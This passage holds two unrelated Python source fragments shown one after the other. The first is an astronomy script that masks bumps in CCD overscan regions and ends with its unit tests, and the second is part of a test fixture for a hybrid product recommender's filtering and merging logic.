    Uses range() instead of Python 2's xrange() so the helper also runs
    under Python 3; in Python 2 the behaviour is identical.
    """
    reducedImage = numpy.zeros((image.shape[0], image.shape[1] - 2))
    for i in range(len(image)):
        row = image[i]
        # Remove the minimum pixel, then the maximum of what remains.
        minPix = row.argmin()
        row = numpy.hstack([row[0:minPix], row[minPix + 1:]])
        maxPix = row.argmax()
        row = numpy.hstack([row[0:maxPix], row[maxPix + 1:]])
        reducedImage[i] = row
    return reducedImage
###############################################################################
def _convertToIndices(boolArray):
return numpy.arange(len(boolArray))[boolArray]
###############################################################################
class _piecewiseLinear(object):
def __init__(self, x1, x2):
self.x1 = x1
self.x2 = x2
###
def __call__(self, x, params):
Aa = params[0]
Ab = params[1]
Ac = params[2]
Bc = params[3]
Bb = (Ac - Ab)*self.x2 + Bc
Ba = (Ab - Aa)*self.x1 + Bb
Ya = Aa*x + Ba
Yb = Ab*x + Bb
Yc = Ac*x + Bc
return numpy.where(x <= self.x1, Ya, numpy.where(x <= self.x2, Yb, Yc))
##############################################################################
def findExclusions(image, threshold = 3, bumpWidth = 2):
    """Return the list of row indices whose summed signal sits above a
    fitted piecewise-linear background by more than threshold*stddev.

    Iterates: fit the background excluding already-known bumps, flag new
    bumps, refit -- until the excluded set stops growing.
    """
    # Collapse each row to a single number.
    marginalizedImage = numpy.sum(image, axis=1)
    X = numpy.arange(len(marginalizedImage))
    # Background broken at 1/3 and 2/3 of the height (Py2 int division).
    backgroundModel = _piecewiseLinear(len(marginalizedImage)/3,
                                       2*len(marginalizedImage)/3)
    ######################
    def findBumps(knownBumps):
        # Fit the background on the non-bump rows only.
        imageNoBumps = marginalizedImage[numpy.logical_not(knownBumps)]
        xNoBumps = X[numpy.logical_not(knownBumps)]
        average = numpy.mean(imageNoBumps)
        bkgroundParams, chisq, covar, isConverged = \
            leastsq.leastsq(backgroundModel, [0,0,0,average],
                            xNoBumps, imageNoBumps, fullOutput = True)
        bkground = backgroundModel(X, bkgroundParams)
        # RMS scatter of the fit residuals on the non-bump rows.
        stddev = numpy.sqrt(numpy.mean( \
            (bkground[numpy.logical_not(knownBumps)] - imageNoBumps)**2))
        candidates = marginalizedImage > (bkground + threshold*stddev)
        ###########
        def filterOverBumpWidth(candidates, operator):
            # AND-combining shifted copies drops isolated spikes narrower
            # than bumpWidth; OR-combining grows survivors back out.
            filtered = candidates
            for i in xrange(1,bumpWidth):
                filtered = operator(candidates, numpy.roll(candidates, i))
                filtered[0:i] = candidates[0:i]
                filtered = operator(filtered, numpy.roll(candidates, -i))
                filtered[-i:] = candidates[-i:]
            return filtered
        ############
        randomsEliminated = filterOverBumpWidth(candidates,
                                                numpy.logical_and)
        bumps = filterOverBumpWidth(randomsEliminated, numpy.logical_or)
        return bumps
    ###############
    # Iterate until no new rows get excluded.
    nExcludedRows = 0
    excluded = findBumps(numpy.array(len(marginalizedImage)*[False]))
    while len(excluded[excluded==True]) > nExcludedRows:
        nExcludedRows = len(excluded[excluded==True])
        excluded = findBumps(excluded)
    return _convertToIndices(excluded).tolist()
######################################################################
###
def _nextElementIsContinuous(alist, curVal):
return len(alist) > 0 and alist[-1] == (curVal + 1)
###
def mergeBumps(bumps):
    """Collapse a list of row indices into (first, last) tuples of
    consecutive runs, in ascending order.

    @param bumps iterable of integer indices (any order)
    @returns list of (lo, hi) inclusive range tuples

    The run-boundary locals were renamed from 'min'/'max', which shadowed
    the Python builtins of the same names.
    """
    sortedBumps = sorted(bumps, reverse=True)
    ranges = []
    while len(sortedBumps) != 0:
        lo = sortedBumps.pop()
        hi = lo
        # Extend the run while the next (smallest remaining) index is hi+1.
        while _nextElementIsContinuous(sortedBumps, hi):
            hi = sortedBumps.pop()
        ranges.append((lo, hi))
    return ranges
######################################################################
def makePolygons(imageWidth, imageOffset, ranges, buffer = 1, vertical = False):
    """Build one regionfile.Polygon box per (min, max) range.

    Each box spans the full image width, is padded by *buffer* on either
    side of the range, shifted by -imageOffset, and finally shifted +1
    because FITS pixel coordinates start at 1.
    """
    regions = []
    for arange in ranges:
        lo = arange[0] - imageOffset - buffer
        hi = arange[1] - imageOffset + buffer
        if vertical:
            corners = [lo, 0,
                       hi, 0,
                       hi, imageWidth,
                       lo, imageWidth]
        else:
            corners = [0, lo,
                       imageWidth, lo,
                       imageWidth, hi,
                       0, hi]
        # FITS coordinates are 1-based.
        regions.append(regionfile.Polygon([c + 1 for c in corners]))
    return regions
########################################################################
########################################################################
#######################
#TESTING CLASSES
#########
class TestOverscanInfo(unittest.TestCase):
    # Parses a realistic bash-style instrument config and checks every
    # chip's overscan bounds (0-based min, exclusive max), direction,
    # and offset.
    def setUp(self):
        configTxt = '''
OVSCANX1=([6]=1 [7]=1 [3]=1 [4]=1 [9]=1 [8]=2055 [1]=2065 [2]=2055 [5]=2055 [10]=1)
OVSCANX2=([6]=28 [7]=28 [3]=28 [4]=28 [9]=28 [8]=2080 [1]=2080 [2]=2080 [5]=2080 [10]=28)
CUTX=([6]=40 [7]=40 [3]=40 [4]=40 [9]=40 [8]=40 [1]=40 [2]=40 [5]=40 [10]=40)
CUTY=([6]=10 [7]=10 [3]=10 [4]=10 [9]=10 [8]=10 [1]=10 [2]=10 [5]=10 [10]=10)
SIZEX=([6]=2000 [7]=2000 [3]=2000 [4]=2000 [9]=2000 [8]=2000 [1]=2000 [2]=2000 [5]=2000 [10]=2000)
SIZEY=([6]=4080 [7]=4080 [3]=4080 [4]=4080 [9]=4080 [8]=4080 [1]=4080 [2]=4080 [5]=4080 [10]=4080)
'''
        self.config = bashreader.parse(configTxt)

    def testGoodInstrumentFile(self):
        overscanRegions = OverscanInfo(self.config)
        # Mins are the 1-based config values minus 1; maxes stay as
        # configured (stored exclusive = configured-1+1).
        self.assertEquals(overscanRegions.getMin(1), 2064)
        self.assertEquals(overscanRegions.getMax(1), 2080)
        self.assertEquals(overscanRegions.getMin(2), 2054)
        self.assertEquals(overscanRegions.getMax(2), 2080)
        self.assertEquals(overscanRegions.getMin(3), 0)
        self.assertEquals(overscanRegions.getMax(3), 28)
        self.assertEquals(overscanRegions.getMin(4), 0)
        self.assertEquals(overscanRegions.getMax(4), 28)
        self.assertEquals(overscanRegions.getMin(5), 2054)
        self.assertEquals(overscanRegions.getMax(5), 2080)
        self.assertEquals(overscanRegions.getMin(6), 0)
        self.assertEquals(overscanRegions.getMax(6), 28)
        self.assertEquals(overscanRegions.getMin(7), 0)
        self.assertEquals(overscanRegions.getMax(7), 28)
        self.assertEquals(overscanRegions.getMin(8), 2054)
        self.assertEquals(overscanRegions.getMax(8), 2080)
        self.assertEquals(overscanRegions.getMin(9), 0)
        self.assertEquals(overscanRegions.getMax(9), 28)
        self.assertEquals(overscanRegions.getMin(10), 0)
        self.assertEquals(overscanRegions.getMax(10), 28)
        # OVSCANX* keys imply the x direction; offsets come from CUTY.
        self.assertTrue(overscanRegions.isXDirection())
        self.assertFalse(overscanRegions.isYDirection())
        self.assertEquals(overscanRegions.getOffset(1), 10)
        self.assertEquals(overscanRegions.getOffset(2), 10)
        self.assertEquals(overscanRegions.getOffset(3), 10)
        self.assertEquals(overscanRegions.getOffset(4), 10)
        self.assertEquals(overscanRegions.getOffset(5), 10)
        self.assertEquals(overscanRegions.getOffset(6), 10)
        self.assertEquals(overscanRegions.getOffset(7), 10)
        self.assertEquals(overscanRegions.getOffset(8), 10)
        self.assertEquals(overscanRegions.getOffset(9), 10)
        self.assertEquals(overscanRegions.getOffset(10), 10)
###################
class TestExtractOverscanRegion(unittest.TestCase):
    # Synthetic image: the first getMax(1) columns at +level, the last 5
    # columns at -level; checks the extracted strip has the configured
    # shape (setMax(1, 29) stores an exclusive max of 30).
    def setUp(self):
        overscan = OverscanInfo()
        overscan.setXOverscanDir()
        overscan.addChip(1)
        overscan.setMin(1, 0)
        overscan.setMax(1, 29)
        overscan.setOffset(1, 5)
        self.overscanInfo = overscan
        self.level = 10000
        self.sigma = .5
        self.ysize = 100
        self.image = numpy.hstack([self.level + \
            self.sigma*numpy.random.standard_normal( \
                size=(self.ysize, self.overscanInfo.getMax(1))),
            -self.level + self.sigma*numpy.random.standard_normal( \
                size=(self.ysize,5))])

    def testExtractOverscan(self):
        overscan = extractOverscan(self.image, self.overscanInfo, chipId = 1)
        self.assertEquals(overscan.shape, (100,30))
################################
class TestFitOverscanRegion(unittest.TestCase):
    # Exercises rejectOutliersByLine and findExclusions on synthetic
    # Gaussian-noise strips with injected outliers and row offsets.
    def setUp(self):
        self.level = 10000
        self.sigma = .5
        self.xsize = 30
        self.ysize = 100
        self.image = self.level + self.sigma*numpy.random.standard_normal( \
            size=(self.ysize, self.xsize))

    def testRejectOutliers(self):
        # Single-pixel spikes must disappear from their rows.
        self.image[5,3] = 10500
        self.image[7,1] = 11200
        overscan = rejectOutliersByLine(self.image)
        self.assertEquals(overscan.shape, (self.ysize,
                                           self.xsize - 2))
        self.assertTrue((overscan[5] != 10500).any())
        self.assertTrue((overscan[7] != 11200).any())

    def testRejectOutliersAllSame(self):
        # Constant rows just lose their first min/max candidates.
        image = numpy.array([5*[3.],5*[2.]])
        self.assertTrue(numpy.array_equal(rejectOutliersByLine(image),
                                          numpy.array([3*[3.],3*[2.]])))

    def testRowConstOffset(self):
        self.image[45,:] += 5*self.sigma
        self.assertEquals(findExclusions(self.image, bumpWidth=1), [45])

    def testFind2Bumps(self):
        self.image[20,:] += 2*self.sigma
        self.image[21,:] += 2*self.sigma
        self.image[22,:] += 2*self.sigma
        self.image[44,:] += 10*self.sigma
        self.image[45,:] += 10*self.sigma
        self.image[46,:] += 10*self.sigma
        self.assertEquals(findExclusions(self.image), [20,21,22,44,45,46])

    def testNoBump(self):
        self.assertEquals(findExclusions(self.image), [])

    def testEqualSensitivity(self):
        # A 3-row bump slid across the full height must be found everywhere.
        bumpsNotDetected = []
        for i in xrange(1, 99):
            image = numpy.ones((100,10))
            image[i-1:i+2,:] *= 5
            if not (findExclusions(image) == range(i-1,i+2)):
                bumpsNotDetected.append(i)
        print "Bumps not detected: %s" % str(bumpsNotDetected)
        self.assertEquals(0, len(bumpsNotDetected))
#########################################################################
class TestCreateRegion(unittest.TestCase):
    # Covers mergeBumps (run merging) and makePolygons (box geometry,
    # offset, FITS +1 shift, buffer, vertical orientation).
    def testSingleRegionMerge(self):
        bumps = [45,46,47]
        self.assertEquals(mergeBumps(bumps), [(45,47)])

    def testDoubleRegionMerge(self):
        bumps = [41,42,43,45,46,47]
        self.assertEquals(mergeBumps(bumps), [(41,43), (45,47)])

    #remember: shift by +1 for fits files
    #add 1 pix buffer either side
    def testMakePolygons(self):
        mergedRows = [(41,43)]
        imageWidth = 40
        imageOffset = 5
        self.assertEquals(makePolygons(imageWidth, imageOffset, mergedRows),
                          [regionfile.Polygon([1,36,41,36,41,40,1,40])])

    def testCreate2Polygons(self):
        mergedRows = [(19,25),(41,43)]
        imageWidth = 40
        imageOffset = 5
        regions = makePolygons(imageWidth, imageOffset, mergedRows)
        self.assertEquals(len(regions), 2)
        self.assertTrue(regionfile.Polygon([1,36,41,36,41,40,1,40]) in regions)
        self.assertTrue(regionfile.Polygon([1,14,41,14,41,22,1,22]) in regions)

    def testYDirection(self):
        mergedRows = [(41,43)]
        imageWidth = 40
        imageOffset = 5
        self.assertEquals(makePolygons(imageWidth, imageOffset,
                                       mergedRows, vertical=True),
                          [regionfile.Polygon([36,1,40,1,40,41,36,41])])

    def testAddBuffer(self):
        mergedRows = [(41,43)]
        imageWidth = 40
        imageOffset = 5
        buffer = 3
        self.assertEquals(makePolygons(imageWidth, imageOffset, mergedRows,
                                       buffer = buffer),
                          [regionfile.Polygon([1,34,41,34,41,42,1,42])])
#########################################################################
class TestRealBump(unittest.TestCase):
    # Regression test against a real overscan strip with a known bleed.
    def setUp(self):
        self.overscan = TestBadOverscansTestData.realbump
        self.image = rejectOutliersByLine(self.overscan)

    def testFindRealBump(self):
        #doesn't have anything outside 58 - 84, but has at least 62-80
        exclude = numpy.array(findExclusions(self.image))
        self.failIf(numpy.logical_or(exclude < 58, exclude > 84).any())
        for i in xrange(62,81):
            self.failIf((exclude != i).all(), 'Missing: %d' % i)
###################################################################
class TestRealDataNoDetect(unittest.TestCase):
    # Regression test: a real clean strip must yield no mask regions.
    def setUp(self):
        self.image = TestBadOverscansTestData.nodetect
        configTxt = '''
OVSCANX1=([6]=1 [7]=1 [3]=1 [4]=1 [9]=1 [8]=2055 [1]=2065 [2]=2055 [5]=2055 [10]=1)
OVSCANX2=([6]=28 [7]=28 [3]=28 [4]=28 [9]=28 [8]=2080 [1]=2080 [2]=2080 [5]=2080 [10]=28)
CUTX=([6]=40 [7]=40 [3]=40 [4]=40 [9]=40 [8]=40 [1]=40 [2]=40 [5]=40 [10]=40)
CUTY=([6]=10 [7]=10 [3]=10 [4]=10 [9]=10 [8]=10 [1]=10 [2]=10 [5]=10 [10]=10)
SIZEX=([6]=2000 [7]=2000 [3]=2000 [4]=2000 [9]=2000 [8]=2000 [1]=2000 [2]=2000 [5]=2000 [10]=2000)
SIZEY=([6]=4080 [7]=4080 [3]=4080 [4]=4080 [9]=4080 [8]=4080 [1]=4080 [2]=4080 [5]=4080 [10]=4080)
'''
        self.overscan = OverscanInfo(bashreader.parse(configTxt))
    ####
    def testNoDetect(self):
        regions = maskOverscanLines(self.image, self.overscan, 7)
        self.assertEquals(len(regions), 0)
###################################################################
class TestProcessChip(unittest.TestCase):
    # End-to-end maskOverscanLines on synthetic chips, one per direction.
    def testXDirectionChip(self):
        image = numpy.ones((50,30))
        overscan = OverscanInfo()
        overscan.setXOverscanDir()
        overscan.addChip(1)
        overscan.setMin(1, 0)
        overscan.setMax(1, 9)
        overscan.setOffset(1, 5)
        # Rows 10-13 of the overscan columns get a 5x bump.
        image[10:14,0:10] *= 5
        regions = maskOverscanLines(image, overscan, 1)
        self.assertEquals(regions, [regionfile.Polygon([1,5,31,5,31,10,1,10])])
    #######
    def testYDirectionChip(self):
        image = numpy.ones((30,50))
        overscan = OverscanInfo()
        overscan.setYOverscanDir()
        overscan.addChip(1)
        overscan.setMin(1, 20)
        overscan.setMax(1, 29)
        overscan.setOffset(1, 5)
        image[20:,10:14] *= 5
        regions = maskOverscanLines(image, overscan, 1)
        self.assertEquals(regions, [regionfile.Polygon([5,1,10,1,10,31,5,31])])
###################################################################
###################################################################
###########################
# METHODS FOR SCRIPT MODE
#############
def test():
    """Run this module's unittest suite with verbose output."""
    loader = unittest.TestLoader()
    testcases = [TestOverscanInfo, TestFitOverscanRegion,
                 TestExtractOverscanRegion, TestRealBump,
                 TestCreateRegion, TestProcessChip,
                 TestRealDataNoDetect]
    suite = unittest.TestSuite(
        [loader.loadTestsFromTestCase(tc) for tc in testcases])
    unittest.TextTestRunner(verbosity=2).run(suite)
#################################
def main():
    """Script entry point: parse options and process one maindir/dir/prefix."""
    parser = OptionParser(usage)
    parser.add_option('-b', '--buffer-size', dest='buffer',
                      help='Num rows around detected region to exclude',
                      type = int, default = 5)
    parser.add_option('-t', '--threshold', dest='threshold',
                      help='Detection threshold for stars in overscan region',
                      type = float, default = 3)
    parser.add_option('-w', '--bump-width', dest='bumpWidth',
                      help='Required width of a bump for detection (in pix)',
                      type = int, default = 2)
    options, args = parser.parse_args()
    # Exactly three positionals required: maindir, dir, prefix.
    if len(args) != 3:
        parser.print_help()
        sys.exit(1)
    maindir, dir, prefix = args
    processDirectory(maindir, dir, prefix,
                     buffer = options.buffer,
                     threshold = options.threshold,
                     bumpWidth = options.bumpWidth)
#################################
if __name__ == '__main__':
    # No arguments: just print usage.
    if len(sys.argv) < 2 :
        print usage
        sys.exit(1)
    if sys.argv[1] == 'test':
        # 'test' runs the unittest suite instead of processing data.
        test()
    else:
        # Register the invocation with the Bonn pipeline logger, run,
        # then record a success status (0).
        __bonn_logger_id__ = BonnLogger.addCommand('maskBadOverscans.py',
                                                   sys.argv[1:])
        main()
        BonnLogger.updateStatus(__bonn_logger_id__, 0)
| |
""" Test fixture for hybrid recommendations.
"""
import datetime as dt
import nose.tools
import barbante.context as ctx
import barbante.maintenance.product_templates as pt
import barbante.maintenance.product_templates_tfidf as pt_tfidf
import barbante.maintenance.user_templates as ut
from barbante.recommendation.tests.fixtures.RecommenderFixture import RecommenderFixture
import barbante.tests as tests
class HybridRecommenderFixture(RecommenderFixture):
""" Class for testing barbante.recommendation.HybridRecommender subclasses.
"""
    def setup(self):
        """Build the shared recommender fixtures, then materialize templates.

        User, product, and tf-idf product templates must exist before the
        hybrid algorithms under test can produce recommendations.
        """
        super().setup()
        ut.generate_templates(self.session_context)
        pt.generate_templates(self.session_context)
        pt_tfidf.generate_templates(self.session_context)
    def test_recommend(self, test_recommendation_quality=True):
        """ Tests whether meaningful recommendations were obtained.

        Always delegates with test_recommendation_quality=False regardless
        of the argument received -- quality checks are presumably covered
        by the per-algorithm fixtures (NOTE(review): confirm).
        """
        super().test_recommend(test_recommendation_quality=False)
    def test_recommend_with_exception_in_one_concrete_recommender(self):
        """ Tests whether the hybrid recommender recovers from a failure in one of the specialists.
        """
        session = tests.init_session(user_id="u_eco_1", algorithm=self.algorithm)
        # Give all the weight to the "Mock" specialist (presumably one that
        # raises -- TODO confirm in the fixture setup) and disable fill-in
        # so nothing can mask the failure.
        session.algorithm_weights = {self.algorithm: [["Mock", 1.0]]}
        session.fill_in_algorithm = None
        recommender = session.get_recommender()
        result = recommender.recommend(self.n_recommendations)
        nose.tools.eq_(result, [], "A failure in a specialist algorithm should yield an empty list")
    def test_recommend_non_existing_user(self):
        """ Tests whether meaningful recommendations are returned even for unknown users.
        """
        session = tests.init_session(user_id="Invalid user id", algorithm=self.algorithm)
        recommender = session.get_recommender()
        results = recommender.recommend(self.n_recommendations)
        nose.tools.ok_(len(results) > 0, "Hybrid recommenders should recommend even for unknown users")
    def test_recommend_anonymous_user(self):
        """ Tests whether valid recommendations are returned for an anonymous user.

        The "hmrtmp_" user-id prefix presumably marks anonymous/temporary
        users -- TODO confirm against the session/user handling code.
        """
        session = tests.init_session(user_id="hmrtmp_AnonymousUser1", algorithm=self.algorithm)
        recommender = session.get_recommender()
        results = recommender.recommend(self.n_recommendations)
        nose.tools.ok_(len(results) > 0, "Hybrid recommenders should recommend even for anonymous users")
    def test_fill_in_products(self):
        """ Tests the merge based on fixed slices.
        """
        n_recommendations = 30
        # Per-algorithm contributions as [score-list, product_id] pairs,
        # already sorted by descending score within each algorithm.
        recommendations_by_alg = {"UBCF": [[[50], "UBCF_1"],
                                           [[30], "UBCF_2"],
                                           [[10], "UBCF_3"],
                                           [[5], "UBCF_4"],
                                           [[2], "UBCF_5"]],
                                  "PBCF": [[[50], "PBCF_1"],
                                           [[30], "PBCF_2"],
                                           [[10], "PBCF_3"],
                                           [[5], "PBCF_4"]],
                                  "CB": [[[50], "CB_1"],
                                         [[40], "CB_2"],
                                         [[30], "CB_3"],
                                         [[20], "CB_4"],
                                         [[10], "CB_5"],
                                         [[9], "CB_6"],
                                         [[8], "CB_7"],
                                         [[7], "CB_8"],
                                         [[4], "CB_9"]],
                                  "POP": [[[50], "POP_1"],
                                          [[30], "POP_2"],
                                          [[10], "POP_3"],
                                          [[5], "POP_4"],
                                          [[4], "POP_5"],
                                          [[3], "POP_6"],
                                          [[4], "POP_7"]]}
        session = tests.init_session(user_id="u_eco_1", algorithm=self.algorithm)
        recommender = session.get_recommender()
        merged_recommendations = recommender.merge_algorithm_contributions(recommendations_by_alg, n_recommendations)
        recommender.include_fill_in_recommendations(merged_recommendations, recommendations_by_alg, n_recommendations)
        products_rank = [rec[1] for rec in merged_recommendations]
        # Everything after position 18 must come from the POP fill-in.
        # NOTE(review): the 18 cutoff presumably reflects the fixture's
        # slice configuration -- confirm against the algorithm weights.
        for item in products_rank[18:]:
            nose.tools.ok_(item.startswith("POP_"), "Wrong rank after merge")
    def test_history_decay_step(self):
        """Intentionally a no-op override; see comment below."""
        # It is not easy to test decays here, since the same item can be recommended by different algorithms.
        # Since the decay logic is applied by the base Recommender, no big deal we do not repeat the test here.
        pass

    def test_history_decay_rational(self):
        """Intentionally a no-op override; see comment below."""
        # It is not easy to test decays here, since the same item can be recommended by different algorithms.
        # Since the decay logic is applied by the base Recommender, no big deal we do not repeat the test here.
        pass

    def test_history_decay_exponential(self):
        """Intentionally a no-op override; see comment below."""
        # It is not easy to test decays here, since the same item can be recommended by different algorithms.
        # Since the decay logic is applied by the base Recommender, no big deal we do not repeat the test here.
        pass

    def test_history_decay_linear(self):
        """Intentionally a no-op override; see comment below."""
        # It is not easy to test decays here, since the same item can be recommended by different algorithms.
        # Since the decay logic is applied by the base Recommender, no big deal we do not repeat the test here.
        pass

    def test_in_boost(self):
        """Intentionally a no-op override; see comment below."""
        # It is not easy to test in-boosts here, since the same item can be recommended by different algorithms.
        # Since the in-boost logic is applied by the base Recommender, no big deal we do not repeat the test here.
        pass

    def test_product_age_decay_exponential(self):
        """Intentionally a no-op override; see comment below."""
        # It is not easy to test decays here, since the same item can be recommended by different algorithms.
        # Since the decay logic is applied by the base Recommender, no big deal we do not repeat the test here.
        pass
    def test_pre_filter_returning_all(self):
        """An empty pre-scoring filter must let every product through."""
        target_user = "u_tec_1"
        custom_settings = {
            'filter_strategy': ctx.BEFORE_SCORING
        }
        # With pre-filtering, the candidate pool is the full product model.
        intended_count = self.db_proxy.get_product_model_count()
        self._check_empty_filter_returning_all_products(custom_settings, intended_count, target_user)
def test_pos_filter_returning_all(self):
target_user = "u_tec_1"
custom_settings = {
'filter_strategy': ctx.AFTER_SCORING
}
session = tests.init_session(user_id=target_user, custom_settings=custom_settings, algorithm=self.algorithm)
recommender = session.get_recommender()
intended_count = len(recommender.recommend(1000))
self._check_empty_filter_returning_all_products(custom_settings, intended_count, target_user)
def test_pre_vs_pos_filter_without_missing_pre_filtered_candidates(self):
filter_string = '{"language": "portuguese", "category": "Economia"}'
n_recommendations = 4
self._check_pre_and_pos_filters_match(filter_string, n_recommendations)
def test_pre_vs_pos_filter_with_missing_pre_filtered_candidates(self):
filter_string = '{"language": "portuguese"}'
n_recommendations = 15
self._check_pre_and_pos_filters_match(filter_string, n_recommendations)
def test_pre_filter_returning_none(self):
self._check_result_is_none_for_bad_filter(ctx.BEFORE_SCORING)
def test_pos_filter_returning_none(self):
self._check_result_is_none_for_bad_filter(ctx.AFTER_SCORING)
def test_pre_filter_with_language(self):
self._check_language_filter(ctx.BEFORE_SCORING)
def test_pos_filter_with_language(self):
self._check_language_filter(ctx.AFTER_SCORING)
def test_pre_filter_with_german_language(self):
strategy = ctx.BEFORE_SCORING
intended_count = 3
self._check_number_of_filtered_products(intended_count, strategy)
def test_pos_filter_with_german_language(self):
strategy = ctx.AFTER_SCORING
intended_count = 2
self._check_number_of_filtered_products(intended_count, strategy)
def test_pre_filter_with_basic_and_parameters(self):
strategy = ctx.BEFORE_SCORING
intended_count = 3
self._check_basic_and_filters(intended_count, strategy)
def test_pos_filter_with_basic_and_parameters(self):
strategy = ctx.AFTER_SCORING
intended_count = 2
self._check_basic_and_filters(intended_count, strategy)
def test_pre_filter_with_basic_or_parameters(self):
strategy = ctx.BEFORE_SCORING
intended_count = 5
self._check_basic_or_filters(intended_count, strategy)
def test_pos_filter_with_basic_or_parameters(self):
strategy = ctx.AFTER_SCORING
intended_count = 5
self._check_basic_or_filters(intended_count, strategy)
def test_pre_filter_with_list_filter(self):
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
custom_settings = {
'filter_strategy': ctx.BEFORE_SCORING
}
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": "source2"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), 2)
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": "source1"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(len(filtered_products), 1)
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": ["source2", "source3"]}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(len(filtered_products), 2)
def test_pos_filter_with_list_filter(self):
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
custom_settings = {
'filter_strategy': ctx.AFTER_SCORING
}
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": "source2"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), 1)
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": "source1"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 0)
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": ["source2", "source3"]}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(len(filtered_products), 1)
    def test_pre_filter_with_dates(self):
        """Date-based context filters applied BEFORE scoring: exact match,
        open $gt / $lt bounds, and combined (consistent vs contradictory) ranges."""
        product_count = self.db_proxy.get_product_model_count()
        target_user = "u_filter_1"
        custom_settings = {
            'filter_strategy': ctx.BEFORE_SCORING
        }
        date = self.session_context.get_present_date()
        date_str = date.isoformat()
        # Exact date match on the present date: 3 products expected.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": "{0}"}}'.format(
                date_str),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
        nose.tools.eq_(len(filtered_products), 3)
        one_hour_before = date - dt.timedelta(hours=1)
        one_hour_after = date + dt.timedelta(hours=1)
        # $gt one hour before "now": same 3 products should pass.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$gt": "{0}"}}}}'.format(
                one_hour_before.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 3)
        # $lt one hour before "now": nothing should pass.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
                one_hour_before.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 0)
        # $lt one hour after "now": all 3 should pass.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
                one_hour_after.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 3)
        # NOTE(review): this sub-case is an exact duplicate of the "$lt one
        # hour before" case above -- possibly a copy-paste slip where a
        # different bound (e.g. $gt one_hour_after) was intended. TODO confirm.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
                one_hour_before.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 0)
        # Consistent range (before, after): all 3 should pass.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$gt": "{0}", "$lt": "{1}"}}}}'.format(
                one_hour_before.isoformat(), one_hour_after.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 3)
        # Contradictory range ($lt before AND $gt after): empty result.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$lt": "{0}", "$gt": "{1}"}}}}'.format(
                one_hour_before.isoformat(), one_hour_after.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 0)
    def test_pos_filter_with_dates(self):
        """Date-based context filters applied AFTER scoring: exact match,
        open $gt / $lt bounds, and combined (consistent vs contradictory) ranges."""
        product_count = self.db_proxy.get_product_model_count()
        target_user = "u_filter_1"
        custom_settings = {
            'filter_strategy': ctx.AFTER_SCORING
        }
        date = self.session_context.get_present_date()
        date_str = date.isoformat()
        # Exact date match on the present date: 2 products expected
        # (post-filtering operates on the already-scored list).
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": "{0}"}}'.format(date_str),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
        nose.tools.eq_(len(filtered_products), 2)
        one_hour_before = date - dt.timedelta(hours=1)
        one_hour_after = date + dt.timedelta(hours=1)
        # $gt one hour before "now": both products should pass.
        session = tests.init_session(
            user_id=target_user,
            custom_settings=custom_settings,
            context_filter_string='{{"language": "german","date": {{"$gt": "{0}"}}}}'.format(
                one_hour_before.isoformat()),
            algorithm=self.algorithm)
        recommender = session.get_recommender()
        filtered_products = recommender.recommend(5)
        nose.tools.eq_(len(filtered_products), 2)
        # $lt one hour before "now": nothing should pass.
        session = tests.init_session(
            user_id=target_user,
